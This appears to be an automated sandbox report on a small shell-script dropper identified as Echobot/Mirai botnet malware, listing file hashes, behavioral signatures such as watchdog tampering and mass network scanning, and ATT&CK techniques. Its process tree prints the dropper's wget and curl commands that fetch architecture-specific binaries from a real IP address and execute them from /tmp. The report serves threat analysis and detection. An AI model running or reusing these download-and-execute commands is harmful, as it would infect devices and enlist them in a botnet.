Analysis
-
max time kernel
54s -
max time network
157s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
10-01-2025 19:07
Static task
static1
Behavioral task
behavioral1
Sample
8UsA.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
8UsA.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
8UsA.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
17bed510a00fcaba1dfad2de86d3f0ac
-
SHA1
bd93c9b1642d9291731933387f1d751c85c6d323
-
SHA256
7a091ce1dfccdfff5db4938ebd85a0a088b255a1ddc0bae4431e160316ef8995
-
SHA512
27d29c3a78b954855c5d29b13a1f69fe8b5fdc4ac4533eccc82a35aab6cf3b9cf34b6990e09fe4fa1a35397bc0d786ecec3fb1b97d8d66cf8e5ef0ebdd149dc9
Malware Config
Signatures
-
Detected Echobot 2 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_echobot behavioral3/files/fstream-4.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (163865) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 745 chmod 729 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/3AvA 730 3AvA /tmp/3AvA 746 3AvA -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp 3AvA -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 4515od14d1fepdhgj0g 746 3AvA -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp 3AvA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/753/exe 3AvA File opened for reading /proc/450/exe 3AvA File opened for reading /proc/455/exe 3AvA File opened for reading /proc/479/exe 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/747/exe 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/478/exe 3AvA -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 733 wget 734 curl 743 cat 746 3AvA -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UnHAnaAW.x86 wget File opened for modification /tmp/UnHAnaAW.x86 curl File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/UnHAnaAW.mips wget File opened for modification /tmp/UnHAnaAW.mips curl File opened for modification /tmp/UnHAnaAW.mpsl wget
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:698 -
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.x862⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/catcat UnHAnaAW.x862⤵PID:728
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-59df6308ae324140800907cd3ce54ef8-systemd-timedated.service-N7CcjL UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:730
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:733
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.mips UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.mpsl2⤵
- Writes file to tmp directory
PID:756
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.mpsl2⤵
- Reads runtime system information
PID:763
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD5e4a5bb69952d1c35c29b3368e8fc17c6
SHA16f8e1ba0b25d60ccb607821337a07d533cbf46d0
SHA2566fed6148fd27b402300a9e3b30e74af00c20af4cb0caa692f69d9e06b7f30eac
SHA5128c7bf047abb4326a51229a6f777834aecf600a76d2f15f5fb62b529dfb24f81b376cae135993203356f453b7228fbba7a2f0deb77a64660a48294d61346b6583
-
Filesize
69KB
MD5fd52a40caadc60323f116d6c5d428aab
SHA1abf8f199130a7b6a9a8886708a4e9f1c6c305cfc
SHA2564de6ec9db86da28a37e3cc1ebd5958856212be7fb403829413277cb091507033
SHA512d541dbfc62019444bc18561cdf3f823ab75fd78bf73b3debeb2ac145419d7e1f4e0a15fc67deca8f83582ac508ce06ace57c03cac03ec9d0164a7841547a1447